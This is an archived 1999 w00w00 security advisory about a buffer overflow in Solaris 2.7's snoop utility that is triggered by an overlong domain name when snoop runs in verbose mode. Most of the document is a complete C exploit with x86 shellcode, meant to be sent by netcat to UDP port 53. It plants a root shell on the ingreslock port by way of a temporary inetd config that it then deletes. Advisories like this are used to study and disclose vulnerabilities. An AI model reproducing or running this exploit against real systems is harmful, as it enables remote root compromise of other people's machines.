Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK) From: Matt Conover <shokat_private> To: newsat_private cc: w00w00at_private Subject: [w00giving #8] Solaris 2.7's snoop Message-ID: <Pine.LNX.3.95.991207044002.14801C-100000at_private> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-newsat_private Precedence: bulk [Note: as we promised, our website and technotronic will get this advisory before anything else does. Thanks for participating in technotronic.] w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwoat_private) Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices). --------------------------------------------------------------------------- Exploit (by cheez): /* Remote Solaris 2.7 x86 snoop exploit Run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop -v" Thanks str/horizon for shellcodes (hi plaguez) */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;" "/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 char buffer[SIZE]; const char x86_nop=0x90; long nop=NOPDEF, esp=0x8047344, offset=DEFOFF; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; fprintf(stderr,"0x%x\n", esp+offset); printf("%s", buffer); return 0; } --------------------------------------------------------------------------- Patch: Because Sun Microsystems doesn't include source, we must wait for them to release a patch. --------------------------------------------------------------------------- http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:17:39 PDT